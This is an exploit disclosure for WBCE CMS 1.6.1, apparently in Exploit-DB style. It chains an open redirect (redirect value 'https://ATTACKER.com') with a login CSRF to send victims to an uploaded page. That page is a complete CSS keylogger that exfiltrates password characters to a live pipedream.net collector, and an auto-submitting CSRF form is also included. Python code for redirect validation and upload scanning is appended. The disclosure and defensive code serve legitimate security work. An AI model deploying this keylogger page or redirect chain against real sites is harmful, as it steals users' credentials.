Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs: Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
1. Login to Account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then upload an HTML file (the HTML file content is as below)
'''
<html>
<head>
<title>
Login
</title>
<style>
input[type="password"][value*="q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/q');}
input[type="password"][value*="w"]{
background-image: url('https://enflownwx6she.x.pipedream.net/w');}
input[type="password"][value*="e"]{
background-image: url('https://enflownwx6she.x.pipedream.net/e');}
input[type="password"][value*="r"]{
background-image: url('https://enflownwx6she.x.pipedream.net/r');}
input[type="password"][value*="t"]{
background-image: url('https://enflownwx6she.x.pipedream.net/t');}
input[type="password"][value*="y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/y');}
input[type="password"][value*="u"]{
background-image: url('https://enflownwx6she.x.pipedream.net/u');}
input[type="password"][value*="i"]{
background-image: url('https://enflownwx6she.x.pipedream.net/i');}
input[type="password"][value*="o"]{
background-image: url('https://enflownwx6she.x.pipedream.net/o');}
input[type="password"][value*="p"]{
background-image: url('https://enflownwx6she.x.pipedream.net/p');}
input[type="password"][value*="a"]{
background-image: url('https://enflownwx6she.x.pipedream.net/a');}
input[type="password"][value*="s"]{
background-image: url('https://enflownwx6she.x.pipedream.net/s');}
input[type="password"][value*="d"]{
background-image: url('https://enflownwx6she.x.pipedream.net/d');}
input[type="password"][value*="f"]{
background-image: url('https://enflownwx6she.x.pipedream.net/f');}
input[type="password"][value*="g"]{
background-image: url('https://enflownwx6she.x.pipedream.net/g');}
input[type="password"][value*="h"]{
background-image: url('https://enflownwx6she.x.pipedream.net/h');}
input[type="password"][value*="j"]{
background-image: url('https://enflownwx6she.x.pipedream.net/j');}
input[type="password"][value*="k"]{
background-image: url('https://enflownwx6she.x.pipedream.net/k');}
input[type="password"][value*="l"]{
background-image: url('https://enflownwx6she.x.pipedream.net/l');}
input[type="password"][value*="z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/z');}
input[type="password"][value*="x"]{
background-image: url('https://enflownwx6she.x.pipedream.net/x');}
input[type="password"][value*="c"]{
background-image: url('https://enflownwx6she.x.pipedream.net/c');}
input[type="password"][value*="v"]{
background-image: url('https://enflownwx6she.x.pipedream.net/v');}
input[type="password"][value*="b"]{
background-image: url('https://enflownwx6she.x.pipedream.net/b');}
input[type="password"][value*="n"]{
background-image: url('https://enflownwx6she.x.pipedream.net/n');}
input[type="password"][value*="m"]{
background-image: url('https://enflownwx6she.x.pipedream.net/m');}
input[type="password"][value*="Q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
input[type="password"][value*="W"]{
background-image: url('https://enflownwx6she.x.pipedream.net/W');}
input[type="password"][value*="E"]{
background-image: url('https://enflownwx6she.x.pipedream.net/E');}
input[type="password"][value*="R"]{
background-image: url('https://enflownwx6she.x.pipedream.net/R');}
input[type="password"][value*="T"]{
background-image: url('https://enflownwx6she.x.pipedream.net/T');}
input[type="password"][value*="Y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
input[type="password"][value*="U"]{
background-image: url('https://enflownwx6she.x.pipedream.net/U');}
input[type="password"][value*="I"]{
background-image: url('https://enflownwx6she.x.pipedream.net/I');}
input[type="password"][value*="O"]{
background-image: url('https://enflownwx6she.x.pipedream.net/O');}
input[type="password"][value*="P"]{
background-image: url('https://enflownwx6she.x.pipedream.net/P');}
input[type="password"][value*="A"]{
background-image: url('https://enflownwx6she.x.pipedream.net/A');}
input[type="password"][value*="S"]{
background-image: url('https://enflownwx6she.x.pipedream.net/S');}
input[type="password"][value*="D"]{
background-image: url('https://enflownwx6she.x.pipedream.net/D');}
input[type="password"][value*="F"]{
background-image: url('https://enflownwx6she.x.pipedream.net/F');}
input[type="password"][value*="G"]{
background-image: url('https://enflownwx6she.x.pipedream.net/G');}
input[type="password"][value*="H"]{
background-image: url('https://enflownwx6she.x.pipedream.net/H');}
input[type="password"][value*="J"]{
background-image: url('https://enflownwx6she.x.pipedream.net/J');}
input[type="password"][value*="K"]{
background-image: url('https://enflownwx6she.x.pipedream.net/K');}
input[type="password"][value*="L"]{
background-image: url('https://enflownwx6she.x.pipedream.net/L');}
input[type="password"][value*="Z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
input[type="password"][value*="X"]{
background-image: url('https://enflownwx6she.x.pipedream.net/X');}
input[type="password"][value*="C"]{
background-image: url('https://enflownwx6she.x.pipedream.net/C');}
input[type="password"][value*="V"]{
background-image: url('https://enflownwx6she.x.pipedream.net/V');}
input[type="password"][value*="B"]{
background-image: url('https://enflownwx6she.x.pipedream.net/B');}
input[type="password"][value*="N"]{
background-image: url('https://enflownwx6she.x.pipedream.net/N');}
input[type="password"][value*="M"]{
background-image: url('https://enflownwx6she.x.pipedream.net/M');}
input[type="password"][value*="1"]{
background-image: url('https://enflownwx6she.x.pipedream.net/1');}
input[type="password"][value*="2"]{
background-image: url('https://enflownwx6she.x.pipedream.net/2');}
input[type="password"][value*="3"]{
background-image: url('https://enflownwx6she.x.pipedream.net/3');}
input[type="password"][value*="4"]{
background-image: url('https://enflownwx6she.x.pipedream.net/4');}
input[type="password"][value*="5"]{
background-image: url('https://enflownwx6she.x.pipedream.net/5');}
input[type="password"][value*="6"]{
background-image: url('https://enflownwx6she.x.pipedream.net/6');}
input[type="password"][value*="7"]{
background-image: url('https://enflownwx6she.x.pipedream.net/7');}
input[type="password"][value*="8"]{
background-image: url('https://enflownwx6she.x.pipedream.net/8');}
input[type="password"][value*="9"]{
background-image: url('https://enflownwx6she.x.pipedream.net/9');}
input[type="password"][value*="0"]{
background-image: url('https://enflownwx6she.x.pipedream.net/0');}
input[type="password"][value*="-"]{
background-image: url('https://enflownwx6she.x.pipedream.net/-');}
input[type="password"][value*="."]{
background-image: url('https://enflownwx6she.x.pipedream.net/.');}
input[type="password"][value*="_"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
input[type="password"][value*="@"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
input[type="password"][value*="?"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
input[type="password"][value*=">"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
input[type="password"][value*="<"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
input[type="password"][value*="="]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
input[type="password"][value*=":"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
input[type="password"][value*=";"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
</style>
</head>
<body>
<label>Please enter username and password</label>
<br><br>
Password:: <input type="password" />
<script>
document.querySelector('input').addEventListener('keyup', (evt)=>{
evt.target.setAttribute('value', evt.target.value);
})
</script>
</body>
</html>
'''
4. Then open the URL of the HTML file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy the URL.
5. Then log out and go to the login page again (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php). The login request looks like this:
POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close
url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
6. If you put https://ATTACKER.com in the url parameter of the above request, you are redirected to attacker.com (open redirect).
7. We set the url parameter to the HTML file's URL:
url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html
8. Then create a CSRF PoC with a CSRF PoC generator:
<html>
<title>
This CSRF was found by miri
</title>
<body>
<h1>
CSRF POC
</h1>
<form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
9. If the victim clicks, they are redirected to the HTML file, and this page sends all of the victim's keyboard activity to my server.
Poc video : https://youtu.be/m-x_rYXTP9E
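The chain above works because the login handler accepts any value in the `url` parameter as a post-login redirect target. The following is an added example (not WBCE's code, written in Python to show the logic a PHP login handler would apply) of how a redirect parameter should be validated: only http/https targets on the application's own host are accepted, protocol-relative and backslash forms are rejected, and the normalized path must stay under an admin prefix. The host name, the `/WBCE_CMS-1.6.1/wbce/admin/` prefix and the sample inputs are assumptions taken from the PoC URLs on this page. Note that a host check alone would not break this particular chain, since the keylogger page was uploaded to the same host; the path-prefix check is what excludes the media directory.

```python
import posixpath
from urllib.parse import quote, unquote, urlsplit


def validate_redirect_target(url: str, app_host: str, allowed_prefix: str) -> str:
    """Return a safe same-site redirect path, or allowed_prefix as the default.

    app_host       -- the host[:port] the application is served from (assumed)
    allowed_prefix -- path prefix redirects must stay under, e.g. the admin area
    """
    default = allowed_prefix
    if not url:
        return default
    url = url.strip()
    # Control characters and backslashes are rejected outright: browsers
    # normalise '\' to '/', so '/\evil.com' would become protocol-relative.
    if any(ord(c) < 0x20 or c == "\\" for c in url):
        return default

    parts = urlsplit(url)
    # Absolute or protocol-relative ('//host') URLs: only http(s) on our own host.
    if parts.scheme or parts.netloc:
        if parts.scheme.lower() not in ("http", "https"):
            return default          # javascript:, data:, '//evil' (empty scheme) ...
        if parts.netloc.lower() != app_host.lower():
            return default          # other hosts, 'host@evil', 'host.evil', other ports

    # Decode once, then normalise so '..' and '%2e%2e' cannot escape the prefix.
    path = unquote(parts.path or "/")
    if not path.startswith("/") or "\\" in path:
        return default
    normalized = posixpath.normpath(path)
    if path.endswith("/") and not normalized.endswith("/"):
        normalized += "/"
    if not normalized.startswith(allowed_prefix):
        return default              # e.g. the /wbce/media/ upload directory

    target = quote(normalized, safe="/")
    return target + ("?" + parts.query if parts.query else "")


if __name__ == "__main__":
    # Constructed inputs modelled on the PoC URLs above.
    host, prefix = "localhost", "/WBCE_CMS-1.6.1/wbce/admin/"
    for candidate in (
        "https://ATTACKER.com",
        "http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html",
        "/WBCE_CMS-1.6.1/wbce/admin/pages/index.php?page=1",
    ):
        print(candidate, "->", validate_redirect_target(candidate, host, prefix))
```

In the real handler the returned path is the only value that may reach the `Location` header; the raw `url` parameter is never echoed. Combined with a CSRF token on the login form, this also removes the CSRF pre-condition of step 8, because a cross-site POST can no longer choose where the victim lands.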
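The second pre-condition is step 3: the media manager stores an uploaded HTML file and serves it from the site origin. As an added example (not WBCE's code), the scanner below inspects an upload and flags CSS rules whose selector tests an input's `value` attribute (`[value*=...]`, `[value^=...]`, `[value$=...]`) and whose body fetches a remote `url(...)`, which is the exfiltration pattern used by the keylogger page above. The sample upload, the `collector.example` host and the file-extension list are constructed for the example.

```python
import re

# Selector that matches on the content of an input's value attribute.
_VALUE_SELECTOR = re.compile(r"\[\s*value\s*[*^$|~]?=", re.IGNORECASE)
# Absolute or protocol-relative URL inside url(...).
_REMOTE_URL = re.compile(r"url\(\s*['\"]?((?:https?:)?//[^'\")\s]+)", re.IGNORECASE)
# Uploads that a browser would render, and in which CSS can run (assumed list).
_RENDERABLE = {"html", "htm", "xhtml", "svg", "css"}


def _css_blocks(text: str) -> list:
    """Return the <style> bodies of an HTML document, or the whole text for a .css file."""
    styles = re.findall(r"<style[^>]*>(.*?)</style>", text, re.IGNORECASE | re.DOTALL)
    return styles if styles else [text]


def find_css_exfil_rules(text: str) -> list:
    """Return (selector, remote_url) for every rule that keys a remote fetch off a value attribute."""
    findings = []
    for css in _css_blocks(text):
        # Crude rule split: 'selector { body }' without nested braces is enough here.
        for selector, body in re.findall(r"([^{}]+)\{([^{}]*)\}", css):
            if not _VALUE_SELECTOR.search(selector):
                continue
            m = _REMOTE_URL.search(body)
            if m:
                findings.append((" ".join(selector.split()), m.group(1)))
    return findings


def should_block_upload(filename: str, content: str) -> bool:
    """Block renderable uploads that contain value-attribute exfiltration rules."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in _RENDERABLE and bool(find_css_exfil_rules(content))


# Constructed sample in the shape of the uploaded page above (collector host is a placeholder).
SAMPLE_UPLOAD = """<html><head><style>
input[type="password"][value*="a"]{
background-image: url('https://collector.example/a');}
input[type="password"][value$="9"] { background: url("//collector.example/end9") }
input[type="text"] { background-image: url('/img/bg.png'); }
body { margin: 0 }
</style></head><body><input type="password"></body></html>"""


if __name__ == "__main__":
    for selector, target in find_css_exfil_rules(SAMPLE_UPLOAD):
        print(f"flagged: {selector} -> {target}")
    print("block css-keyloger.html:", should_block_upload("css-keyloger.html", SAMPLE_UPLOAD))
```

The scan is a detection aid, not the primary fix: an uploaded file can be obfuscated past any pattern. The stronger controls are to keep HTML out of the media upload types altogether, or to serve the media directory with `Content-Disposition: attachment` and a restrictive `Content-Security-Policy` so uploaded markup is never rendered in the site's origin.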